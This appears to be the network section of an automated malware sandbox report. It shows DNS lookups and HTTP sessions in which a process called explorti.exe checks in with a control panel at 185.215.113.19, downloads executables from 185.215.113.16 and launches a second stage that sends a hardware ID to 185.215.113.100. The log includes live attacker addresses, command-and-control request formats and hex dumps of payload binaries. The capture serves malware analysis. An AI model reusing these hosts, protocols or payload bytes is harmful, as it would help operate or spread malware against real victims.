Sep 1, 2024 06:31:17.747046947 CEST	192.168.2.5	1.1.1.1	0x7232	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Sep 1, 2024 06:31:21.377952099 CEST	192.168.2.5	1.1.1.1	0x1736	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:31:21.378846884 CEST	192.168.2.5	1.1.1.1	0xc513	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 1, 2024 06:28:16.718780994 CEST	1.1.1.1	192.168.2.5	0xc297	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 06:28:16.718799114 CEST	1.1.1.1	192.168.2.5	0x444c	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 06:28:18.688163042 CEST	1.1.1.1	192.168.2.5	0x9cf9	No error (0)	shed.dual-low.s-part-0032.t-0009.t-msedge.net	s-part-0032.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 06:28:18.688163042 CEST	1.1.1.1	192.168.2.5	0x9cf9	No error (0)	s-part-0032.t-0009.t-msedge.net		13.107.246.60	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.912859917 CEST	1.1.1.1	192.168.2.5	0x844	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.912859917 CEST	1.1.1.1	192.168.2.5	0x844	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.913860083 CEST	1.1.1.1	192.168.2.5	0xa5e6	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Sep 1, 2024 06:28:19.914027929 CEST	1.1.1.1	192.168.2.5	0xb23e	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.914027929 CEST	1.1.1.1	192.168.2.5	0xb23e	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.914532900 CEST	1.1.1.1	192.168.2.5	0xc874	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.914532900 CEST	1.1.1.1	192.168.2.5	0xc874	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.914544106 CEST	1.1.1.1	192.168.2.5	0x4b97	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Sep 1, 2024 06:28:19.915407896 CEST	1.1.1.1	192.168.2.5	0xf4e0	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.915407896 CEST	1.1.1.1	192.168.2.5	0xf4e0	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.915492058 CEST	1.1.1.1	192.168.2.5	0x19d9	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Sep 1, 2024 06:28:19.915971994 CEST	1.1.1.1	192.168.2.5	0xcb61	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Sep 1, 2024 06:28:20.083352089 CEST	1.1.1.1	192.168.2.5	0x82b3	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Sep 1, 2024 06:28:20.083615065 CEST	1.1.1.1	192.168.2.5	0x1b1f	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:20.083615065 CEST	1.1.1.1	192.168.2.5	0x1b1f	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:31:17.096771955 CEST	1.1.1.1	192.168.2.5	0xb729	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Sep 1, 2024 06:31:17.097738981 CEST	1.1.1.1	192.168.2.5	0x2384	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:31:17.097738981 CEST	1.1.1.1	192.168.2.5	0x2384	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:31:17.821744919 CEST	1.1.1.1	192.168.2.5	0x99d8	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 06:31:17.822772980 CEST	1.1.1.1	192.168.2.5	0x7232	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 06:31:21.388045073 CEST	1.1.1.1	192.168.2.5	0x1736	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:31:21.388045073 CEST	1.1.1.1	192.168.2.5	0x1736	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:31:21.388365030 CEST	1.1.1.1	192.168.2.5	0xc513	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

slscr.update.microsoft.com

edgeassetservice.azureedge.net

chrome.cloudflare-dns.com

fs.microsoft.com

https:

www.google.com

185.215.113.19

185.215.113.16

185.215.113.100

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:02.309585094 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:03.059550047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:03.063524008 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:03.325351954 CEST	466	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 31 33 0d 0a 20 3c 63 3e 31 30 30 30 30 35 31 30 30 30 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 30 30 35 32 30 30 30 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 30 30 35 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 30 65 65 66 65 62 38 38 34 36 64 39 33 34 66 34 38 62 31 35 65 61 61 34 39 35 63 34 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 113 <c>1000051000+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1000052000+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1000053001+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb0eefeb8846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	185.215.113.16	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:03.338871956 CEST	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Sep 1, 2024 06:28:04.087773085 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:03 GMT Content-Type: application/octet-stream Content-Length: 1771008 Last-Modified: Sun, 01 Sep 2024 01:45:41 GMT Connection: keep-alive ETag: "66d3c745-1b0600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 30 67 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 67 00 00 04 00 00 d3 4f 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELMfB"0g@`gO@P#d# #<@.rsrc #L@.idata #L@ )$N@ylafldxqMP@tgmwlthu g@.taggant00g"@
Sep 1, 2024 06:28:04.087804079 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 1, 2024 06:28:04.087810993 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 1, 2024 06:28:04.087970018 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 1, 2024 06:28:04.087980986 CEST	776	IN	Data Raw: 0d 17 2b 73 fa c9 c0 68 62 77 b6 29 5a 76 f6 94 50 d8 34 70 73 62 54 8a 6f 01 52 0c 4b 04 7b 75 d4 cc 37 14 62 26 14 e8 bf a6 35 41 83 a9 d7 ad b2 8d e3 b5 44 05 42 ac b0 f4 f4 ac d6 04 56 73 94 d2 ef dd 90 80 e3 51 c7 44 bc 76 42 c2 6c e1 d5 ed Data Ascii: +shbw)ZvP4psbToRK{u7b&5ADBVsQDvBlfOQS'X0q@^crX@J f"{\|L!TvvZt=u=RZ)%DTPwC]X4#TjyY_S6(:Fj1iukh$m/
Sep 1, 2024 06:28:04.088033915 CEST	1236	IN	Data Raw: 83 35 a6 68 2f fe 39 15 50 71 0e 09 e6 0f 5b 9d d0 7e 91 25 7d 8f bd a0 72 70 24 ed 8f 2e f7 5e b9 65 f5 09 29 bb b7 21 ad 52 dd 22 cf a0 91 e5 fb 04 e7 6d c5 90 ff 24 a5 94 af 76 c0 b6 02 49 fd ff 21 8a 73 9e 52 0a dc aa bb 78 91 31 59 34 7c 7c Data Ascii: 5h/9Pq[~%}rp$.^e)!R"m$vI!sRx1Y4\|\|AqJ'g\|!Wt'^Z"a)q\|R%GpBReY<>hieeoi'/<nb03@KAM\Q)D&ZzCj\~#4A]F{Icq<TX~)
Sep 1, 2024 06:28:04.088044882 CEST	1236	IN	Data Raw: e4 ce dd 13 1d 89 fc 6b bd a6 3a 94 43 7e 2f 26 92 58 52 b6 44 6e bb 1a 31 ee 52 6b bd 5e b7 81 48 93 8f 13 85 8b 2a 65 bd 54 2f 46 41 2c fa 58 2d 12 27 41 bd 06 23 56 dd 1a 95 b5 18 31 36 eb 98 12 2a 02 91 ff 01 5e 1a bc 16 16 d1 01 b3 40 27 29 Data Ascii: k:C~/&XRDn1Rk^HeT/FA,X-'A#V16^@')+U>A#m)qKwFDB52}DFx-M-\MNK.VjLtDxt!/.B)D /zVIWV6\%QdKF;&NR\1w$~_K/2U$h#
Sep 1, 2024 06:28:04.088059902 CEST	1236	IN	Data Raw: d9 12 ca ef 6e 36 81 6c b0 ae 3b 79 ed ce d2 10 91 53 14 fd 7c 56 2a 24 0d 2b b8 f3 70 96 27 86 f3 01 8f 69 b7 98 5d ea 19 ee 54 76 7c dd 5e e9 7f 06 c7 da 32 fe f6 78 74 be 21 5e 1c 6a 42 25 b1 cc 29 16 44 2b 2e 85 17 d6 a8 e5 f3 01 ab 69 5b 98 Data Ascii: n6l;yS\|V$+p'i]Tv\|^2xt!^jB%)D+.i[UN,{qY)r/tUf{jOtE{-GjLupKHxp~~0ytop3XE6x[~Z~e3xE)R\LtFk{rHJo^[LB7x/xk>c
Sep 1, 2024 06:28:04.088072062 CEST	1236	IN	Data Raw: 5b cc 49 22 4c 51 c1 37 95 80 5b 16 4c cc 0e 43 e5 a2 57 b0 9d ed b6 69 4c 82 f7 f6 a3 b6 7b 73 41 92 74 78 66 4c 54 20 c5 ae a5 6b 58 46 2a 72 3d 92 16 85 0c b2 b3 ab 20 01 3b 66 6b 79 ff a8 48 9a cf 75 6b 93 96 69 4c 1b 96 cd 0c e8 56 c1 4b 36 Data Ascii: [I"LQ7[LCWiL{sAtxfLT kXFr= ;fkyHukiLVK6;\|.ri2U&]YxE6zWx}fuRC}U3rRCwp-DG)rj.eX%PiL,"Y>EtB["Bvtbytj"g!sNuk}A6x,fX"#>
Sep 1, 2024 06:28:04.088083029 CEST	536	IN	Data Raw: 22 53 b9 23 b9 29 07 71 15 51 57 b1 c0 7e 0f 79 74 7a 22 c7 1a 36 fc 72 48 fa 3a 79 a6 8e f8 ef 43 ce 7e 45 6f ae 53 79 29 d3 b9 14 49 b2 f7 ab 49 7a 08 26 9a ba d1 78 89 06 97 d2 c7 fe 1e 79 74 de 21 23 1b 8a fc 7b 65 64 37 79 e5 2c 5d 59 4d 36 Data Ascii: "S#)qQW~ytz"6rH:yC~EoSy)IIz&xyt!#{ed7y,]YM6X0#KF-u-GjLGy}~sRy#vR&,X JqKX0Vk*\#%.W9uqT-.vK>3n]1i~;AW.wdlNhU[fv
Sep 1, 2024 06:28:04.092803955 CEST	1236	IN	Data Raw: 64 b0 e5 3e 87 df 44 92 52 3a eb 6a 43 e5 ac 7d dd 98 64 6a ce c2 10 68 91 5d 3a 31 ff 4a 76 71 9b c9 bb e4 4f a5 4f 98 44 c2 e2 b1 57 e0 41 1d d5 2a 1b dc aa 92 ad 15 26 f9 99 36 43 a3 ba 71 21 ae 27 be 57 29 d1 fe 18 ba 7f e9 e5 ef 72 b5 12 2f Data Ascii: d>DR:jC}djh]:1JvqOODWA&6Cq!'W)r/5>+Wt^>\|V1qN!2$ReS&~&jW]<`Hpy`cagyg@HEtDrKZj2K@Svh.DECxD=AE6D;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:06.575423002 CEST	182	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000051000&unit=246122658369
Sep 1, 2024 06:28:07.298969984 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	185.215.113.16	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:07.307507992 CEST	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Sun, 01 Sep 2024 01:45:41 GMT If-None-Match: "66d3c745-1b0600"
Sep 1, 2024 06:28:08.068414927 CEST	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:07 GMT Last-Modified: Sun, 01 Sep 2024 01:45:41 GMT Connection: keep-alive ETag: "66d3c745-1b0600"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	185.215.113.100	80	4592	C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:08.815037966 CEST	90	OUT	GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Sep 1, 2024 06:28:09.588017941 CEST	203	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 04:28:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 06:28:09.804523945 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC Host: 185.215.113.100 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 34 42 38 34 36 32 41 30 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 2d 2d 0d 0a Data Ascii: ------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="hwid"8F4B8462A0E5845770397------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="build"leva------CBFBKFIDHIDGHJKFBGHC--
Sep 1, 2024 06:28:10.229496002 CEST	210	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 04:28:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:08.815205097 CEST	182	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 35 32 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000052000&unit=246122658369
Sep 1, 2024 06:28:09.581002951 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49711	185.215.113.16	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:10.012506962 CEST	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Sep 1, 2024 06:28:10.743386984 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:10 GMT Content-Type: application/octet-stream Content-Length: 917504 Last-Modified: Sun, 01 Sep 2024 04:16:44 GMT Connection: keep-alive ETag: "66d3eaac-e0000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 ea d3 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 50 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELf"Pw@`V@@@d\|@u4@.text `.rdata@@.datalpH@.rsrc@@@.relocuv@B
Sep 1, 2024 06:28:10.743434906 CEST	164	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$
Sep 1, 2024 06:28:10.743633032 CEST	1236	IN	Data Raw: 44 00 e8 2f f0 01 00 59 c3 e8 de 25 00 00 68 1c 24 44 00 e8 1e f0 01 00 59 c3 e8 ae e7 01 00 68 21 24 44 00 e8 0d f0 01 00 59 c3 e8 41 32 00 00 68 26 24 44 00 e8 fc ef 01 00 59 c3 e8 50 c1 01 00 68 30 24 44 00 e8 eb ef 01 00 59 c3 b9 04 25 4d 00 Data Ascii: D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\I0MH,M3MMM
Sep 1, 2024 06:28:10.743721008 CEST	1236	IN	Data Raw: ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00 00 8d 8f 6c fd ff ff e8 29 ba 00 00 8d b7 5c fd ff ff 8b ce c7 06 44 c9 49 00 e8 74 02 00 00 ff 76 04 e8 82 e8 01 00 8b Data Ascii: <IvY\|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404Y$<Iv
Sep 1, 2024 06:28:10.743731976 CEST	1236	IN	Data Raw: 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 8b 7f 38 eb d2 8b 40 38 eb ee 33 c0 c7 05 80 18 4d 00 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34 15 4d 00 6a 0a 89 0d Data Ascii: )E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGF
Sep 1, 2024 06:28:10.743798018 CEST	492	IN	Data Raw: cd 00 00 00 84 c0 75 0c 8b ca e8 c2 00 00 00 84 c0 75 01 c3 b0 01 c3 55 8b ec 51 51 56 57 8b 7d 08 8d 45 ff 50 8d 45 f8 c7 45 f8 01 00 00 00 50 57 8b f1 e8 4e 00 00 00 85 c0 78 38 8b 4f 04 8b 45 f8 8b 04 81 66 83 78 08 7f 0f 85 33 08 04 00 80 7d Data Ascii: uuUQQVW}EPEEPWNx8OEfx3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)t
Sep 1, 2024 06:28:10.743808031 CEST	1236	IN	Data Raw: e8 16 8d 00 00 85 c0 0f 85 c7 06 04 00 8b 47 04 33 c9 83 fe 2b 0f 94 c1 8b 44 88 08 66 83 78 08 47 75 42 8d 41 03 89 45 f8 8d 45 fc 53 50 8d 45 e8 50 8d 45 f8 50 57 e8 1b 44 00 00 85 c0 0f 88 a2 06 04 00 8d 4d e8 e8 6e 77 00 00 8b 55 fc e9 25 ff Data Ascii: G3+DfxGuBAEESPEPEPWDMnwU%lMc3_^[jiXlU<SVMMW}3E7Nuu3RB3t&u"@f9putBuu6UMEPdEM@
